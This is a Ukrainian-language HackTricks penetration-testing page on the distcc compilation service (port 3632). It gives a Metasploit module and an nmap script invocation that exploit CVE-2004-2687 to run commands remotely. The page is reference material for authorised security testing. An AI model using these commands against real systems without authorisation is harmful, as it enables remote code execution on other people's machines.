3632 - Pentesting distcc

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити вашу компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв GitHub.

Базова інформація

Distcc - це інструмент, який покращує процес компіляції, використовуючи вільну потужність обробки інших комп'ютерів у мережі. Коли distcc налаштований на машині, ця машина може розподіляти свої завдання компіляції на іншу систему. Ця система-одержувач повинна запускати демон distccd та мати встановлений сумісний компілятор для обробки надісланого коду.

Порт за замовчуванням: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Експлуатація

Перевірте, чи є вразливість до CVE-2004-2687 для виконання довільного коду:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Я не вважаю, що Shodan виявляє цей сервіс.

Ресурси

Пост створений Álex B (@r1p)

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити вашу компанію рекламовану в HackTricks або завантажити HackTricks у PDF Перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв.

Previous3389 - Pentesting RDP Next3690 - Pentesting Subversion (svn server)

Last updated 1 month ago